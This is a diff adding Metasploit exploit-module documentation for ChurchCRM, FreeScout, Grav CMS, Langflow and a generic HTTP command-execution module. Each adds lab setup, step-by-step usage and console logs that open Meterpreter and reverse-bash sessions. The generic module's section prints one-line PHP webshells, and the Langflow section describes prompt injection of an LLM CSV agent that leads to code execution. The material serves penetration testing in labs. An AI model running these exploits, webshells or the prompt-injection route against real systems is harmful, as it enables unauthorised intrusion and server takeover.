+   SRVPORT  8080             yes       The local port to listen on.
+
+
+Payload options (php/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   2   PHP (fetch)
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/churchcrm_db_restore_rce) > check
+[*] Found ChurchCRM version: 6.1.0
+[*] 127.0.0.1:80 - The target appears to be vulnerable. Vulnerable version 6.1.0 detected via CRM-VERSION header.
+msf exploit(multi/http/churchcrm_db_restore_rce) > run
+[*] Started reverse TCP handler on 172.18.0.1:4444
+[*] Starting HTTP server to serve the payload...
+[*] Using URL: http://172.18.0.1:8080/egTqoxbjVEOA0
+[*] Getting the session cookie
+[+] The session cookie has been received
+[*] Uploading the file : .htaccess
+[+] The file have been uploaded successfully
+[*] Uploading the file : CVOdZQanyf.php
+[+] The file have been uploaded successfully
+[*] Trying to execute the payload
+[*] Sending stage (42137 bytes) to 172.18.0.2
+[+] Deleted .htaccess
+[+] Deleted CVOdZQanyf.php
+[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:39974) at 2026-03-06 09:56:50 +0100
+[+] Payload successfully executed
+[*] Server stopped.
+
+meterpreter > getpid
+Current pid: 204
+meterpreter > getuid
+Server username: www-data
+meterpreter > sysinfo
+Computer        : 92a096dddee2
+OS              : Linux 92a096dddee2 6.18.13-arch1-1 #1 SMP PREEMPT_DYNAMIC Wed, 25 Feb 2026 23:12:35 +0000 x86_64
+Architecture    : x64
+System Language : C
+Meterpreter     : php/linux
+meterpreter >
+```

documentation/modules/exploit/multi/http/freescout_htaccess_rce.md

@@ -0,0 +1,354 @@
+## Vulnerable Application
+
+This module exploits an unauthenticated remote code execution vulnerability in
+FreeScout <= 1.8.206 (CVE-2026-28289). The `sanitizeUploadedFileName()` function
+checks for dot-prefixed filenames before stripping Unicode format characters
+(ZWSP U+200B), creating a TOCTOU condition that allows `.htaccess` upload via
+email attachment.
+
+The exploit sends a crafted email with a ZWSP-prefixed `.htaccess` attachment
+to a FreeScout mailbox. When FreeScout fetches the email via IMAP/POP3 polling,
+the ZWSP is stripped and the file is stored as `.htaccess`. The file uses
+Apache's `SetHandler` directive to make itself executable as PHP.
+
+### Docker Setup
+
+```bash
+mkdir freescout-lab && cd freescout-lab
+```
+
+Create `mailpit-auth.txt`:
+
+```
+support@freescout.local:password
+```
+
+Create `docker-compose.yml`:
+
+```yaml
+services:
+  app:
+    build:
+      context: .
+      args:
+        FREESCOUT_VERSION: "1.8.206"
+    container_name: freescout-lab
+    ports:
+      - "8889:80"
+    depends_on:
+      db:
+        condition: service_healthy
+      mail:
+        condition: service_started
+
+  db:
+    image: mariadb:10.11
+    container_name: freescout-db
+    environment:
+      MYSQL_DATABASE: freescout
+      MYSQL_USER: freescout
+      MYSQL_PASSWORD: freescout
+      MYSQL_ROOT_PASSWORD: root
+    healthcheck:
+      test: ["CMD", "healthcheck.sh", "--connect", "--innodb_initialized"]
+      interval: 5s
+      timeout: 3s
+      retries: 10
+
+  mail:
+    image: axllent/mailpit:latest
+    container_name: freescout-mail
+    ports:
+      - "8025:8025"
+      - "1026:1025"
+    volumes:
+      - ./mailpit-auth.txt:/auth.txt:ro
+    environment:
+      MP_SMTP_AUTH_ACCEPT_ANY: 1
+      MP_SMTP_AUTH_ALLOW_INSECURE: 1
+      MP_POP3_AUTH_FILE: /auth.txt
+```
+
+Create `Dockerfile`:
+
+```dockerfile
+FROM php:8.1-apache
+
+ARG FREESCOUT_VERSION=1.8.206
+
+RUN apt-get update && apt-get install -y \
+    libpng-dev libjpeg-dev libfreetype6-dev libzip-dev libicu-dev \
+    libxml2-dev libonig-dev unzip git curl default-mysql-client cron \
+    && docker-php-ext-configure gd --with-freetype --with-jpeg \
+    && docker-php-ext-install gd zip intl mbstring xml pdo pdo_mysql bcmath iconv \
+    && a2enmod rewrite \
+    && rm -rf /var/lib/apt/lists/*
+
+WORKDIR /tmp
+RUN rm -rf /var/www/html && git clone --depth 1 --branch ${FREESCOUT_VERSION} \
+    https://github.com/freescout-helpdesk/freescout.git /var/www/html
+WORKDIR /var/www/html
+
+RUN chown -R www-data:www-data /var/www/html \
+    && chmod -R 755 /var/www/html/storage /var/www/html/bootstrap/cache
+
+RUN sed -i 's/AllowOverride None/AllowOverride All/g' /etc/apache2/apache2.conf
+ENV APACHE_DOCUMENT_ROOT=/var/www/html/public
+RUN sed -ri 's!/var/www/html!${APACHE_DOCUMENT_ROOT}!g' /etc/apache2/sites-available/*.conf
+
+COPY docker-entrypoint.sh /usr/local/bin/
+RUN chmod +x /usr/local/bin/docker-entrypoint.sh
+
+ENTRYPOINT ["docker-entrypoint.sh"]
+CMD ["apache2-foreground"]
+```
+
+Create `docker-entrypoint.sh`:
+
+```bash
+#!/bin/bash
+set -e
+
+echo "[*] Waiting for MySQL..."
+until php -r "new PDO('mysql:host=db;dbname=freescout', 'freescout', 'freescout');" 2>/dev/null; do
+    sleep 2
+done
+
+if [ ! -f /var/www/html/.env ]; then
+    echo "[*] Creating .env..."
+    cat > /var/www/html/.env << 'EOF'
+APP_URL=http://localhost:8889
+APP_KEY=base64:RDsOPJLEGKDP8BPkWmgbAgDrT3VGhns1MiCPSKGBpMo=
+DB_CONNECTION=mysql
+DB_HOST=db
+DB_PORT=3306
+DB_DATABASE=freescout
+DB_USERNAME=freescout
+DB_PASSWORD=freescout
+APP_DEBUG=true
+EOF
+    chown www-data:www-data /var/www/html/.env
+fi
+
+echo "[*] Running migrations..."
+cd /var/www/html
+php artisan migrate --force --seed 2>/dev/null || php artisan migrate --force
+
+echo "[*] Creating storage link..."
+rm -f /var/www/html/public/storage
+ln -s /var/www/html/storage/app /var/www/html/public/storage
+
+echo "[*] Creating admin user and mailbox..."
+php -r "
+require '/var/www/html/vendor/autoload.php';
+\$app = require_once '/var/www/html/bootstrap/app.php';
+\$kernel = \$app->make(Illuminate\Contracts\Console\Kernel::class);
+\$kernel->bootstrap();
+
+\$u = App\User::firstOrNew(['email' => 'admin@freescout.local']);
+\$u->fill([
+    'first_name' => 'Admin',
+    'last_name'  => 'User',
+    'password'   => bcrypt('admin123'),
+    'role'       => App\User::ROLE_ADMIN,
+    'status'     => App\User::STATUS_ACTIVE,
+]);
+\$u->save();
+echo \"[+] Admin user ready\n\";
+
+\$m = App\Mailbox::firstOrNew(['email' => 'support@freescout.local']);
+\$m->name = 'Support';
+\$m->email = 'support@freescout.local';
+\$m->in_server = 'mail';
+\$m->in_port = 1110;
+\$m->in_protocol = 2;
+\$m->in_encryption = 1;
+\$m->in_username = 'support@freescout.local';
+\$m->in_password = 'password';
+\$m->in_validate_cert = 0;
+\$m->ticket_status = 1;
+\$m->ticket_assignee = 1;
+\$m->out_method = 3;
+\$m->out_server = 'mail';
+\$m->out_port = 1025;
+\$m->out_username = '';
+\$m->out_password = '';
+\$m->out_encryption = 1;
+\$m->save();
+
+try {
+    \$m->users()->syncWithoutDetaching([\$u->id]);
+} catch (Exception \$e) {}
+
+echo \"[+] Mailbox ready: support@freescout.local (POP3 from mail:1110)\n\";
+"
+
+php artisan freescout:clear-cache 2>/dev/null || true
+chown -R www-data:www-data /var/www/html/storage
+
+echo "* * * * * www-data /usr/local/bin/php /var/www/html/artisan schedule:run >> /dev/null 2>&1" > /etc/cron.d/freescout
+chmod 0644 /etc/cron.d/freescout
+service cron start
+
+echo "[+] FreeScout lab ready at http://localhost:8889"
+echo "[+] Mailpit UI at http://localhost:8025"
+echo "[+] SMTP: localhost:1026 | POP3: mail:1110"
+echo "[+] Mailbox: support@freescout.local"
+exec "$@"
+```
+
+```bash
+chmod +x docker-entrypoint.sh
+docker compose up -d
+```
+
+Wait about 60 seconds for migrations, admin user creation, and mailbox setup.
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. `use exploit/multi/http/freescout_htaccess_rce`
+3. `set RHOST 127.0.0.1` (SMTP server)
+4. `set RPORT 1026` (SMTP port)
+5. `set HTTPHOST 127.0.0.1` (FreeScout web server)
+6. `set HTTPPORT 8889` (FreeScout web port)
+7. `set MAILTO support@freescout.local`
+8. `set LHOST <your-ip>`
+9. `check` - verify it returns `Detected`
+10. `run` - verify a session opens (may take up to 60s for email fetch)
+
+## Options
+
+### MAILTO
+
+The FreeScout mailbox email address to send the exploit email to. This must be
+a valid, configured mailbox in the target FreeScout instance.
+
+### RHOST / RPORT
+
+The SMTP server and port used to deliver the exploit email. These come from the
+SMTPDeliver mixin (note: singular `RHOST`, not `RHOSTS`). This can be the
+target's own MX server, or any relay that delivers to the mailbox.
+
+### HTTPHOST / HTTPPORT
+
+The FreeScout web server address and port. Used for the check method and to find
+the uploaded shell. Separate from RHOST because the SMTP and HTTP targets may
+be different hosts. Set `SSL true` for HTTPS targets. The module reads the
+server `Date` header to calculate when the next cron cycle will fetch the email.
+
+### FETCH_WAIT (Advanced)
+
+Seconds to wait for the cron fetch cycle. Default is `60` (FreeScout polls every
+minute). The module uses the server `Date` header to calculate the exact wait
+time; this value is the fallback when the header is absent.
+
+### DIR_COUNTER (Advanced)
+
+Max attachment counter per directory to scan. Default is `3`. On production
+instances with many conversations per mailbox, attachments may have higher
+counter values. Increase this if the module fails to find the shell.
+
+## Scenarios
+
+### FreeScout 1.8.206 - PHP Meterpreter (Target 0)
+
+```
+msf6 > use exploit/multi/http/freescout_htaccess_rce
+msf6 exploit(multi/http/freescout_htaccess_rce) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(multi/http/freescout_htaccess_rce) > set RPORT 1026
+RPORT => 1026
+msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPHOST 127.0.0.1
+HTTPHOST => 127.0.0.1
+msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPPORT 8889
+HTTPPORT => 8889
+msf6 exploit(multi/http/freescout_htaccess_rce) > set MAILTO support@freescout.local
+MAILTO => support@freescout.local
+msf6 exploit(multi/http/freescout_htaccess_rce) > set LHOST 192.168.192.1
+LHOST => 192.168.192.1
+msf6 exploit(multi/http/freescout_htaccess_rce) > set PAYLOAD php/meterpreter/reverse_tcp
+PAYLOAD => php/meterpreter/reverse_tcp
+msf6 exploit(multi/http/freescout_htaccess_rce) > run
+
+[*] Started reverse TCP handler on 192.168.192.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. FreeScout detected. Version cannot be determined remotely.
+[*] Sending exploit email to support@freescout.local via 127.0.0.1:1026
+[+] Exploit email sent
+[*] Waiting 15s for next cron fetch cycle...
+[+] Shell at /storage/attachment/5/1/1/.htaccess
+[*] Sending stage (42137 bytes) to 192.168.192.4
+[*] Meterpreter session 1 opened (192.168.192.1:4444 -> 192.168.192.4:50250) at 2026-03-05 17:37:11 +0100
+
+meterpreter >
+```
+
+### FreeScout 1.8.206 - Reverse Bash Shell (Target 1)
+
+```
+msf6 > use exploit/multi/http/freescout_htaccess_rce
+msf6 exploit(multi/http/freescout_htaccess_rce) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(multi/http/freescout_htaccess_rce) > set RPORT 1026
+RPORT => 1026
+msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPHOST 127.0.0.1
+HTTPHOST => 127.0.0.1
+msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPPORT 8889
+HTTPPORT => 8889
+msf6 exploit(multi/http/freescout_htaccess_rce) > set MAILTO support@freescout.local
+MAILTO => support@freescout.local
+msf6 exploit(multi/http/freescout_htaccess_rce) > set LHOST 192.168.192.1
+LHOST => 192.168.192.1
+msf6 exploit(multi/http/freescout_htaccess_rce) > set TARGET 1
+TARGET => 1
+msf6 exploit(multi/http/freescout_htaccess_rce) > set PAYLOAD cmd/unix/reverse_bash
+PAYLOAD => cmd/unix/reverse_bash
+msf6 exploit(multi/http/freescout_htaccess_rce) > run
+
+[*] Started reverse TCP handler on 192.168.192.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. FreeScout detected. Version cannot be determined remotely.
+[*] Sending exploit email to support@freescout.local via 127.0.0.1:1026
+[+] Exploit email sent
+[*] Waiting 13s for next cron fetch cycle...
+[+] Shell at /storage/attachment/9/3/1/.htaccess
+[*] Command shell session 2 opened (192.168.192.1:4444 -> 192.168.192.4:41830) at 2026-03-05 17:42:35 +0100
+
+sh-5.2$
+```
+
+### FreeScout 1.8.206 - Linux Dropper Meterpreter (Target 2)
+
+```
+msf6 > use exploit/multi/http/freescout_htaccess_rce
+msf6 exploit(multi/http/freescout_htaccess_rce) > set RHOST 127.0.0.1
+RHOST => 127.0.0.1
+msf6 exploit(multi/http/freescout_htaccess_rce) > set RPORT 1026
+RPORT => 1026
+msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPHOST 127.0.0.1
+HTTPHOST => 127.0.0.1
+msf6 exploit(multi/http/freescout_htaccess_rce) > set HTTPPORT 8889
+HTTPPORT => 8889
+msf6 exploit(multi/http/freescout_htaccess_rce) > set MAILTO support@freescout.local
+MAILTO => support@freescout.local
+msf6 exploit(multi/http/freescout_htaccess_rce) > set LHOST 192.168.192.1
+LHOST => 192.168.192.1
+msf6 exploit(multi/http/freescout_htaccess_rce) > set TARGET 2
+TARGET => 2
+msf6 exploit(multi/http/freescout_htaccess_rce) > set PAYLOAD linux/x64/meterpreter/reverse_tcp
+PAYLOAD => linux/x64/meterpreter/reverse_tcp
+msf6 exploit(multi/http/freescout_htaccess_rce) > run
+
+[*] Started reverse TCP handler on 192.168.192.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[!] The service is running, but could not be validated. FreeScout detected. Version cannot be determined remotely.
+[*] Sending exploit email to support@freescout.local via 127.0.0.1:1026
+[+] Exploit email sent
+[*] Waiting 24s for next cron fetch cycle...
+[+] Shell at /storage/attachment/7/4/1/.htaccess
+[*] Command Stager progress - 100.00% done (817/817 bytes)
+[*] Meterpreter session 3 opened (192.168.192.1:4444 -> 192.168.192.4:52100) at 2026-03-05 17:48:02 +0100
+
+meterpreter >
+```

documentation/modules/exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286.md

@@ -0,0 +1,132 @@
+## Vulnerable Application
+
+Grav is a modern, open source flat-file content management system (CMS) built on PHP.
+It uses a file-based architecture instead of a traditional database, storing content and configuration directly on disk.
+
+This module exploits an authenticated Remote Code Execution vulnerability
+in Grav CMS via the Admin panel’s Direct Install plugin functionality,
+allowing arbitrary PHP execution.
+
+An authenticated administrative user can upload a crafted plugin ZIP archive containing arbitrary PHP code.
+Upon installation, the archive is extracted into the following directory:
+
+```sh
+user/plugins/<plugin_name>plugin/<plugin_name>plugin.php
+```
+
+Grav automatically loads plugin PHP files during initialization.
+As a result, the malicious PHP file is executed in the context of the web server user
+(typically `www-data`), leading to remote code execution.
+
+No additional sandboxing or content validation is applied to plugin PHP files during the Direct Install workflow,
+making this functionality inherently dangerous when access control boundaries are crossed.
+
+## Affected Versions
+
+**Vulnerable:** Grav CMS `1.1.x` -> `1.7.x` versions / Admin Plugin `v1.2.x` -> `v1.10.x`
+**Tested:** Grav CMS v1.7.48, v1.7.49.5 / Admin Plugin v1.10.48, v1.10.49.3
+
+### Installation
+
+Official website:
+https://getgrav.org/
+
+Direct download archive (example version tested):
+https://github.com/getgrav/grav/releases/tag/1.7.48
+
+1. Install dependencies:
+
+```sh
+sudo apt update
+sudo apt install apache2 php php-cli php-zip php-curl unzip -y
+```
+
+2. Download Grav:
+
+``` sh
+wget https://github.com/getgrav/grav/releases/download/1.7.48/grav-admin-v1.7.48.zip
+unzip grav-admin-v1.7.48.zip
+sudo mv grav-admin /var/www/html/grav
+sudo chown -R www-data:www-data /var/www/html/grav
+```
+
+3. Visit the below and create an administrative user during setup.
+
+```sh
+http://<target>/grav/admin
+```
+
+4. Ensure:
+
+- Admin plugin is enabled
+- Direct Install functionality is available
+
+## Verification Steps
+
+1. Install Grav CMS with Admin plugin enabled as mentioned above.
+2. Create an administrative user.
+3. Start `msfconsole`.
+4. Do: `use exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286`
+5. Do: `set RHOSTS [target]`
+6. Do: `set RPORT [Port]`
+7. Do: `set USERNAME [username]`
+8. Do: `set PASSWORD [password]`
+9. Do: `check`
+10. You should see the target is vulnerable
+
+## Options
+
+### USERNAME
+
+Valid administrative username. `Required.`
+
+### PASSWORD
+
+Valid administrative password. `Required.`
+
+## Scenarios
+### Version Tested
+
+Grav CMS: 1.7.48/1.7.49.5
+Admin Plugin: 1.10.48/1.10.49.3
+PHP: 8.1
+Web Server: Apache 2.4
+
+### Example: Exploiting Grav CMS v1.7.48 to get Meterpreter
+
+```msf6
+msf6 > use exploit/multi/http/grav_admin_direct_install_rce_cve_2025_50286
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set rhosts 192.168.1.12
+rhosts => 192.168.1.12
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set rport 8080
+rport => 8080
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set username x1o3
+username => x1o3
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set password Real_Pass123
+password => Real_Pass123
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > set lhost 172.17.0.1
+lhost => 172.17.0.1
+msf6 exploit(multi/http/grav_admin_direct_install_rce_cve_2025_50286) > run
+[*] Started reverse TCP handler on 172.17.0.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+    - Grav CMS 1.7.49.5 is vulnerable
+    - Admin Plugin v1.10.49.3 is vulnerable
+[*] Authenticating to Grav admin...
+[*] Authenticating...
+[+] Already authenticated
+[*] Uploading plugin via Direct Install...
+[*] Sending stage (40004 bytes) to 172.18.0.2
+[*] Cleaning up plugin directory: user/plugins/g02omdfkh89ki8zruwplugin
+[+] Plugin directory removed
+[*] Meterpreter session 1 opened (172.17.0.1:4444 -> 172.18.0.2:52520) at 2026-03-27 11:42:25 +0530
+
+meterpreter > shell
+Process 25 created.
+Channel 0 created.
+id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+```
+
+---
+

documentation/modules/exploit/multi/http/langflow_rce_cve_2026_27966.md

@@ -0,0 +1,186 @@
+## Vulnerable Application
+
+The CSV Agent node in Langflow hardcodes allow_dangerous_code=True,
+which automatically exposes LangChain’s Python REPL tool (python_repl_ast).
+As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection,
+leading to full Remote Code Execution (RCE).
+
+The vulnerability affects:
+
+    * Langflow < 1.8.0
+
+This module was successfully tested on:
+
+    * Langflow 1.7.3 installed with Docker
+
+
+### Installation
+1. `git clone https://github.com/langflow-ai/langflow.git`
+
+2. `git checkout 1.7.3`
+
+3. `cd langflow/docker_example`
+
+4. `Edit docker-compose.yml`
+```
+ services:
+   langflow:
+-    image: langflowai/langflow:latest # or another version tag on https://hub.docker.com/r/langflowai/langflow
+-    pull_policy: always               # set to 'always' when using 'latest' image
++    # image: langflowai/langflow:latest # or another version tag on https://hub.docker.com/r/langflowai/langflow
++    image: langflowai/langflow:1.7.3 # or another version tag on https://hub.docker.com/r/langflowai/langflow
++    # pull_policy: always               # set to 'always' when using 'latest' image
+     ports:
+       - "7860:7860"
+     depends_on:
+@@ -11,7 +12,7 @@ services:
+       # This variable defines where the logs, file storage, monitor data and secret keys are stored.
+       - LANGFLOW_CONFIG_DIR=/app/langflow
+     volumes:
+-      - langflow-data:/app/langflow
++      - langflow-data:/app
+ 
+   postgres:
+     image: postgres:16
+```
+
+5. `docker compose up`
+
+6. `On an attacker machine`
+```
+curl -fsSL https://ollama.com/install.sh | sh
+ollama run llama3.1
+```
+
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/multi/http/langflow_rce_cve_2026_27966`
+4. Do: `run lhost=<lhost> rhost=<rhost> ollamaapiuri=<ollamaapiuri> apikey=<apikey> model=<model>`
+5. You should get a meterpreter
+
+
+## Options
+
+### APIKEY (required)
+
+Langflow API key to interact with Langflow.
+
+### OLLAMAAPIURI (required)
+
+Endpoint of the OLLAMA API controlled by an attacker.
+
+### MODEL (required)
+
+Valid ollama model name.
+
+
+## Scenarios
+
+### cmd/linux/http/x64/meterpreter_reverse_tcp
+```
+msf > use exploit/multi/http/langflow_rce_cve_2026_27966
+[*] Using configured payload cmd/linux/http/x64/meterpreter_reverse_tcp
+msf exploit(multi/http/langflow_rce_cve_2026_27966) > options
+
+Module options (exploit/multi/http/langflow_rce_cve_2026_27966):
+
+   Name          Current Setting  Required  Description
+   ----          ---------------  --------  -----------
+   APIKEY                         yes       Langflow API key to interact with Langflow.
+   MODEL                          yes       Valid ollama model name.
+   OLLAMAAPIURI                   yes       Endpoint of the OLLAMA API controlled by an attacker.
+   Proxies                        no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5h, sapni, socks4, socks5, http
+   RHOSTS                         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT         7860             yes       The target port (TCP)
+   SSL           false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                          no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter_reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    true             yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash, zsh) (Ac
+                                              cepted: none, python3.8+, shell-search, shell)
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
+   LHOST                            yes       The listen address (an interface may be specified)
+   LPORT           4444             yes       The listen port
+
+
+   When FETCH_COMMAND is one of CURL,GET,WGET:
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   FETCH_PIPE  false            yes       Host both the binary payload and the command so it can be piped directly to the shell.
+
+
+   When FETCH_FILELESS is none:
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_FILENAME      yVhDYYwMmZm      no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_WRITABLE_DIR  ./               yes       Remote writable dir to store payload; cannot contain spaces
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux Command
+
+
+
+View the full module info with the info, or info -d command.
+
+msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payl
+oad=cmd/linux/http/x64/meterpreter_reverse_tcp target=Linux\ Command
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
+[*] Project: 367f399f-6f17-43a2-bea0-33183baae731
+[*] Flow: 42098574-2343-4b8a-97fe-0e2800270087
+[*] Job: 014b3154-e882-4649-9c16-5f25e4c358d9
+[*] Waiting...
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.16:59440) at 2026-04-18 12:31:49 +0900
+
+meterpreter > getuid
+Server username: user
+meterpreter > sysinfo
+Computer     : d513d5e46402
+OS           : Debian 13.3 (Linux 6.8.0-56-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter > 
+```
+
+### python/meterpreter/reverse_tcp
+```
+msf exploit(multi/http/langflow_rce_cve_2026_27966) > run rhost=192.168.56.16 lhost=192.168.56.1 ollamaapiuri=http://192.168.56.1:11434 apikey=<apikey> model=llama3.1:latest payload=python/meterpreter/reverse_tcp target=Python\ payload
+[*] Started reverse TCP handler on 192.168.56.1:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version 1.7.3 detected and API key is valid. Which is vulnerable.
+[*] Project: 146bfdff-95cc-4e43-b0f2-dbdaa6916401
+[*] Flow: 497484a7-6f39-4418-8113-aba0c2f57a3b
+[*] Job: 0e4282ad-bf9d-4079-891b-81a2ccb8dbe8
+[*] Waiting...
+[*] Sending stage (23404 bytes) to 192.168.56.16
+[*] Meterpreter session 2 opened (192.168.56.1:4444 -> 192.168.56.16:47988) at 2026-04-18 12:48:07 +0900
+
+meterpreter > getuid
+Server username: user
+meterpreter > sysinfo
+Computer        : d513d5e46402
+OS              : Linux 6.8.0-56-generic #58-Ubuntu SMP PREEMPT_DYNAMIC Fri Feb 14 15:33:28 UTC 2025
+Architecture    : x64
+System Language : C
+Meterpreter     : python/linux
+meterpreter > 
+```

documentation/modules/exploit/multi/http/os_cmd_exec.md

@@ -0,0 +1,266 @@
+## Vulnerable Application
+
+This module is for any generic HTTP command execution where user-supplied input is directly passed to system execution functions via a HTTP request.
+As a result, able to use:
+- Any web command execution vulnerability _(think hardware devices having ping/traceroute functions)_
+- Any lab target, which have a "command execution" module.
+  - Such as [DVWA](https://github.com/digininja/DVWA) or [Mutillidae](https://github.com/webpwnized/mutillidae)
+  - Included with [Metasploitable](https://docs.rapid7.com/metasploit/metasploitable-2/)
+- Alternatively, simulate with one of the following PHP code snippets (for a basic webshell):
+  - `<?php system($_REQUEST["cmd"]); ?>`
+  - `<?php passthru($_REQUEST["cmd"]); ?>`
+  - `<?php echo exec($_REQUEST["cmd"]); ?>`
+  - `<?php echo shell_exec($_REQUEST["cmd"]); ?>`
+  - `<?php echo fread(popen($_REQUEST["cmd"], "r"), 2096); ?>`
+  - ```<?php echo `{$_REQUEST["cmd"]}`; ?>```
+
+This is similar to `exploits/unix/webapp/php_eval`, except it isn't limited to PHP’s code execution, but can use any OS command execution function.
+
+- - -
+
+Setting up a quick PHP test lab on a Debian-base host:
+
+```console
+$ sudo apt-get install --yes apache2 php curl
+[...]
+$
+$ sudo systemctl start apache2
+$
+$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/html/shell.php
+<?php system($_REQUEST["cmd"]); ?>
+$
+$ curl localhost/shell.php?cmd=id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+$
+```
+
+## Verification Steps
+
+1. Setup lab, or find a web command execution vulnerability
+1. Start `msfconsole`
+1. Do: `use exploits/multi/http/os_cmd_exec`
+1. Do: Set `RHOSTS` and `URIPATH` (`HEADERS` and `POSTDATA` are optional, depending on vulnerability). May also want to customize the payload and `LHOST` if desired
+1. Do: `run`
+1. You should get a shell
+
+## Options
+
+### `HEADERS`
+
+Any additional HTTP headers to send, cookies for example. Format: `header:value,header2:value2`.
+
+### `POSTDATA`
+
+Any HTTP POST method request data to send, with the command injection placeholder set to `!INJECT!`.
+If this value is blank, will be a HTTP GET method request.
+
+### `Proxies`
+
+A proxy chain of format: `type:host:port[,type:host:port][...]`.
+Supported proxies: `sapni`, `socks4`, `socks5`, `socks5h`, `http`
+
+### `RHOSTS`
+
+The target host(s), see: https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+
+### `RPORT`
+
+The target port (TCP).
+Default: `80`
+
+### `SSL`
+
+Negotiate SSL/TLS for outgoing connections.
+Default: `false`
+
+### `URIPATH`
+
+The URI to request, with the command injection placeholder set to `!INJECT!`.
+Default: `/ping/?cmd=!INJECT!`
+
+### `VHOST`
+
+HTTP server virtual host.
+
+## Scenarios
+
+### Example PHP Lab
+
+```console
+msfadmin@metasploitable:~$ echo '<?php system($_REQUEST["cmd"]); ?>' | sudo tee /var/www/shell.php
+<?php system($_REQUEST["cmd"]); ?>
+msfadmin@metasploitable:~$ curl localhost/shell.php?cmd=id
+uid=33(www-data) gid=33(www-data) groups=33(www-data)
+msfadmin@metasploitable:~$
+
+
+
+msf exploit(multi/http/os_cmd_exec) > options
+
+Module options (exploit/multi/http/os_cmd_exec):
+
+   Name      Current Setting          Required  Description
+   ----      ---------------          --------  -----------
+   HEADERS                            no        Any additional HTTP headers to send, cookies for example. Format: "header:value,header2:value2"
+   POSTDATA                           no        POST data to send, with the eval()'d parameter changed to !INJECT!. Otherwise will be a GET request.
+   Proxies                            no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sapni, socks4
+   RHOSTS    10.0.0.10                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT     80                       yes       The target port (TCP)
+   SSL       false                    no        Negotiate SSL/TLS for outgoing connections
+   URIPATH   /shell.php?cmd=!INJECT!  yes       The URI to request, with the eval()'d parameter changed to !INJECT!", "/ping/?cmd=!INJECT!
+   VHOST                              no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x86/meterpreter/reverse_tcp):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FETCH_COMMAND   CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE    false            yes       Attempt to delete the binary after execution
+   FETCH_FILELESS  none             yes       Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8, tested shells are sh, bash,
+                                              zsh) (Accepted: none, python3.8+, shell-search, shell)
+   FETCH_SRVHOST                    no        Local IP to use for serving payload
+   FETCH_SRVPORT   8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                    no        Local URI to use for serving payload
